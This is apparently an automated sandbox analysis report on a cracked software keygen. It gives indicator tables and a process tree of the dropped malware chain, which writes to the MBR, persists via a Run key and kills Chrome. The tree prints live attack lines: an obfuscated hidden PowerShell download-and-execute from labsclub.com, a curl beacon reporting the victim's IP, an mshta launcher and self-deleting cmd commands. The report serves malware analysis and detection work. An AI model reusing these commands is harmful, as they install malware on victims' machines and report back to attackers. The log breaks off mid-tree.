3920	7502.tmp.exe
1524	file.exe
1524	file.exe
1524	file.exe
1524	file.exe
1524	file.exe
1524	file.exe
1628	1614924671815.exe
1628	1614924671815.exe
964	1614924676690.exe
964	1614924676690.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe
3932	multitimer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1524	file.exe
Token: SeShutdownPrivilege	212	msiexec.exe
Token: SeIncreaseQuotaPrivilege	212	msiexec.exe
Token: SeSecurityPrivilege	3504	msiexec.exe
Token: SeCreateTokenPrivilege	212	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	212	msiexec.exe
Token: SeLockMemoryPrivilege	212	msiexec.exe
Token: SeIncreaseQuotaPrivilege	212	msiexec.exe
Token: SeMachineAccountPrivilege	212	msiexec.exe
Token: SeTcbPrivilege	212	msiexec.exe
Token: SeSecurityPrivilege	212	msiexec.exe
Token: SeTakeOwnershipPrivilege	212	msiexec.exe
Token: SeLoadDriverPrivilege	212	msiexec.exe
Token: SeSystemProfilePrivilege	212	msiexec.exe
Token: SeSystemtimePrivilege	212	msiexec.exe
Token: SeProfSingleProcessPrivilege	212	msiexec.exe
Token: SeIncBasePriorityPrivilege	212	msiexec.exe
Token: SeCreatePagefilePrivilege	212	msiexec.exe
Token: SeCreatePermanentPrivilege	212	msiexec.exe
Token: SeBackupPrivilege	212	msiexec.exe
Token: SeRestorePrivilege	212	msiexec.exe
Token: SeShutdownPrivilege	212	msiexec.exe
Token: SeDebugPrivilege	212	msiexec.exe
Token: SeAuditPrivilege	212	msiexec.exe
Token: SeSystemEnvironmentPrivilege	212	msiexec.exe
Token: SeChangeNotifyPrivilege	212	msiexec.exe
Token: SeRemoteShutdownPrivilege	212	msiexec.exe
Token: SeUndockPrivilege	212	msiexec.exe
Token: SeSyncAgentPrivilege	212	msiexec.exe
Token: SeEnableDelegationPrivilege	212	msiexec.exe
Token: SeManageVolumePrivilege	212	msiexec.exe
Token: SeImpersonatePrivilege	212	msiexec.exe
Token: SeCreateGlobalPrivilege	212	msiexec.exe
Token: SeCreateTokenPrivilege	212	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	212	msiexec.exe
Token: SeLockMemoryPrivilege	212	msiexec.exe
Token: SeIncreaseQuotaPrivilege	212	msiexec.exe
Token: SeMachineAccountPrivilege	212	msiexec.exe
Token: SeTcbPrivilege	212	msiexec.exe
Token: SeSecurityPrivilege	212	msiexec.exe
Token: SeTakeOwnershipPrivilege	212	msiexec.exe
Token: SeLoadDriverPrivilege	212	msiexec.exe
Token: SeSystemProfilePrivilege	212	msiexec.exe
Token: SeSystemtimePrivilege	212	msiexec.exe
Token: SeProfSingleProcessPrivilege	212	msiexec.exe
Token: SeIncBasePriorityPrivilege	212	msiexec.exe
Token: SeCreatePagefilePrivilege	212	msiexec.exe
Token: SeCreatePermanentPrivilege	212	msiexec.exe
Token: SeBackupPrivilege	212	msiexec.exe
Token: SeRestorePrivilege	212	msiexec.exe
Token: SeShutdownPrivilege	212	msiexec.exe
Token: SeDebugPrivilege	212	msiexec.exe
Token: SeAuditPrivilege	212	msiexec.exe
Token: SeSystemEnvironmentPrivilege	212	msiexec.exe
Token: SeChangeNotifyPrivilege	212	msiexec.exe
Token: SeRemoteShutdownPrivilege	212	msiexec.exe
Token: SeUndockPrivilege	212	msiexec.exe
Token: SeSyncAgentPrivilege	212	msiexec.exe
Token: SeEnableDelegationPrivilege	212	msiexec.exe
Token: SeManageVolumePrivilege	212	msiexec.exe
Token: SeImpersonatePrivilege	212	msiexec.exe
Token: SeCreateGlobalPrivilege	212	msiexec.exe
Token: SeCreateTokenPrivilege	212	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	212	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
212	msiexec.exe
4324	Setup3310.tmp
4548	chashepro3.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4780	IBInstaller_97039.tmp
4368	vict.tmp
4344	5injklgbowl.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp
4768	vpn.tmp

Suspicious use of SetWindowsHookEx 38 IoCs

pid	Process
208	Setup.exe
3916	C0CA61A12E4C8B38.exe
1292	C0CA61A12E4C8B38.exe
2932	firefox.exe
1628	1614924671815.exe
2900	firefox.exe
964	1614924676690.exe
2900	firefox.exe
632	1614924682753.exe
4116	askinstall24.exe
4128	safebits.exe
4164	5injklgbowl.exe
4248	vict.exe
4260	Setup3310.exe
4324	Setup3310.tmp
4344	5injklgbowl.tmp
4368	vict.tmp
4444	chashepro3.exe
4548	chashepro3.tmp
4560	vpn.exe
4768	vpn.tmp
4880	Abbas.exe
2116	IBInstaller_97039.exe
4780	IBInstaller_97039.tmp
4352	chrome_proxy.exe
5164	ThunderFW.exe
5292	wimapi.exe
5432	winlthst.exe
5680	Setup.exe
5704	Setup.tmp
5872	5wnugjhjeyk.exe
5928	5wnugjhjeyk.tmp
5340	MiniThunderPlatform.exe
4528	tapinstall.exe
4540	MicrosoftEdge.exe
6136	ProPlugin.exe
5452	ProPlugin.tmp
4136	tapinstall.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 880 wrote to memory of 2076	880	Snap.Grabber.2.5.crack.by.aaocg.exe	78
PID 880 wrote to memory of 2076	880	Snap.Grabber.2.5.crack.by.aaocg.exe	78
PID 880 wrote to memory of 2076	880	Snap.Grabber.2.5.crack.by.aaocg.exe	78
PID 2076 wrote to memory of 1632	2076	cmd.exe	81
PID 2076 wrote to memory of 1632	2076	cmd.exe	81
PID 2076 wrote to memory of 1632	2076	cmd.exe	81
PID 2076 wrote to memory of 1336	2076	cmd.exe	82
PID 2076 wrote to memory of 1336	2076	cmd.exe	82
PID 2076 wrote to memory of 1336	2076	cmd.exe	82
PID 2076 wrote to memory of 996	2076	cmd.exe	83
PID 2076 wrote to memory of 996	2076	cmd.exe	83
PID 2076 wrote to memory of 996	2076	cmd.exe	83
PID 2076 wrote to memory of 2420	2076	cmd.exe	84
PID 2076 wrote to memory of 2420	2076	cmd.exe	84
PID 2076 wrote to memory of 2420	2076	cmd.exe	84
PID 1632 wrote to memory of 440	1632	keygen-pr.exe	85
PID 1632 wrote to memory of 440	1632	keygen-pr.exe	85
PID 1632 wrote to memory of 440	1632	keygen-pr.exe	85
PID 2420 wrote to memory of 1524	2420	keygen-step-4.exe	86
PID 2420 wrote to memory of 1524	2420	keygen-step-4.exe	86
PID 2420 wrote to memory of 1524	2420	keygen-step-4.exe	86
PID 996 wrote to memory of 3540	996	keygen-step-3.exe	87
PID 996 wrote to memory of 3540	996	keygen-step-3.exe	87
PID 996 wrote to memory of 3540	996	keygen-step-3.exe	87
PID 440 wrote to memory of 4048	440	key.exe	89
PID 440 wrote to memory of 4048	440	key.exe	89
PID 440 wrote to memory of 4048	440	key.exe	89
PID 3540 wrote to memory of 1908	3540	cmd.exe	90
PID 3540 wrote to memory of 1908	3540	cmd.exe	90
PID 3540 wrote to memory of 1908	3540	cmd.exe	90
PID 1524 wrote to memory of 3968	1524	file.exe	91
PID 1524 wrote to memory of 3968	1524	file.exe	91
PID 1524 wrote to memory of 3968	1524	file.exe	91
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 3968 wrote to memory of 3920	3968	7502.tmp.exe	92
PID 1524 wrote to memory of 3896	1524	file.exe	93
PID 1524 wrote to memory of 3896	1524	file.exe	93
PID 1524 wrote to memory of 3896	1524	file.exe	93
PID 3896 wrote to memory of 2836	3896	cmd.exe	96
PID 3896 wrote to memory of 2836	3896	cmd.exe	96
PID 3896 wrote to memory of 2836	3896	cmd.exe	96
PID 2420 wrote to memory of 208	2420	keygen-step-4.exe	95
PID 2420 wrote to memory of 208	2420	keygen-step-4.exe	95
PID 2420 wrote to memory of 208	2420	keygen-step-4.exe	95
PID 208 wrote to memory of 212	208	Setup.exe	97
PID 208 wrote to memory of 212	208	Setup.exe	97
PID 208 wrote to memory of 212	208	Setup.exe	97
PID 3504 wrote to memory of 2760	3504	msiexec.exe	99
PID 3504 wrote to memory of 2760	3504	msiexec.exe	99
PID 3504 wrote to memory of 2760	3504	msiexec.exe	99
PID 208 wrote to memory of 3916	208	Setup.exe	100
PID 208 wrote to memory of 3916	208	Setup.exe	100
PID 208 wrote to memory of 3916	208	Setup.exe	100

C:\Users\Admin\AppData\Local\Temp\Snap.Grabber.2.5.crack.by.aaocg.exe
"C:\Users\Admin\AppData\Local\Temp\Snap.Grabber.2.5.crack.by.aaocg.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:440
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:4048
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1336
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3540
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:1908
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1524
    - - C:\Users\Admin\AppData\Roaming\7502.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\7502.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3968
      - C:\Users\Admin\AppData\Roaming\7502.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\7502.tmp.exe"
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3896
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:2836
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies system certificate store
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:208
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        5⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:212
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:3916
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2932
      - C:\Users\Admin\AppData\Roaming\1614924671815.exe
        
        "C:\Users\Admin\AppData\Roaming\1614924671815.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614924671815.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1628
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2900
      - C:\Users\Admin\AppData\Roaming\1614924676690.exe
        
        "C:\Users\Admin\AppData\Roaming\1614924676690.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614924676690.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:964
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2900
      - C:\Users\Admin\AppData\Roaming\1614924682753.exe
        
        "C:\Users\Admin\AppData\Roaming\1614924682753.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614924682753.txt"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:632
      - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5164
      - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetWindowsHookEx
        
        PID:5340
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:1292
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:3536
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:2936
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
        6⤵
        
        PID:3180
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:2000
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
        5⤵
        
        PID:1700
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        Runs ping.exe
        
        PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
      4⤵
      Executes dropped EXE
      PID:1172
    - - C:\Users\Admin\AppData\Local\Temp\QV1U7882U0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QV1U7882U0\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2364
      - C:\Users\Admin\AppData\Local\Temp\QV1U7882U0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QV1U7882U0\multitimer.exe" 1 3.1614921294.6041be4e0dab2 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\QV1U7882U0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QV1U7882U0\multitimer.exe" 2 3.1614921294.6041be4e0dab2
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3932
        
        C:\Users\Admin\AppData\Local\Temp\rchguheldti\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rchguheldti\askinstall24.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4116
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:4704
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\lrdptdklpef\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lrdptdklpef\safebits.exe" /S /pubid=1 /subid=451
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\benpbq5kcb2\5injklgbowl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\benpbq5kcb2\5injklgbowl.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\is-655U1.tmp\5injklgbowl.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-655U1.tmp\5injklgbowl.tmp" /SL5="$10272,870426,780800,C:\Users\Admin\AppData\Local\Temp\benpbq5kcb2\5injklgbowl.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\is-U43I1.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-U43I1.tmp\winlthst.exe" test1 test1
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\SjZ5nLVJT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SjZ5nLVJT.exe"
        11⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im SjZ5nLVJT.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\SjZ5nLVJT.exe" & del C:\ProgramData\*.dll & exit
        12⤵
        
        PID:6948
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im SjZ5nLVJT.exe /f
        13⤵
        Kills process with taskkill
        
        PID:7028
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        13⤵
        Delays execution with timeout.exe
        
        PID:6260
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\umjqlavkcgg\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\umjqlavkcgg\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\is-8OIGQ.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8OIGQ.tmp\Setup3310.tmp" /SL5="$10270,802346,56832,C:\Users\Admin\AppData\Local\Temp\umjqlavkcgg\Setup3310.exe" /Verysilent /subid=577
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\is-L7LS8.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L7LS8.tmp\Setup.exe" /Verysilent
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\is-77653.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-77653.tmp\Setup.tmp" /SL5="$204A6,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-L7LS8.tmp\Setup.exe" /Verysilent
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\ProPlugin.exe" /Verysilent
        12⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\is-UN4G3.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UN4G3.tmp\ProPlugin.tmp" /SL5="$3043E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-UOUJ2.tmp\ProPlugin.exe" /Verysilent
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\is-QBBN4.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QBBN4.tmp\Setup.exe"
        14⤵
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
        15⤵
        
        PID:4944
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        16⤵
        Runs .reg file with regedit
        
        PID:5408
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        16⤵
        Kills process with taskkill
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\curl.exe
        
        curl.exe "https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?ip=154.61.71.13&loc=US&app=Staoism&payoutcents=0.08&ver=3.5" -k
        16⤵
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        16⤵
        
        PID:4504
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        17⤵
        
        PID:3160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\chrome64.bat" h"
        18⤵
        
        PID:5284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        19⤵
        
        PID:5692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffaea4e6e00,0x7ffaea4e6e10,0x7ffaea4e6e20
        20⤵
        
        PID:5136
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1652 /prefetch:8
        20⤵
        
        PID:652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:2
        20⤵
        
        PID:4364
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,5162233216984385926,15533135393705157369,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:1
        20⤵
        
        PID:4884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
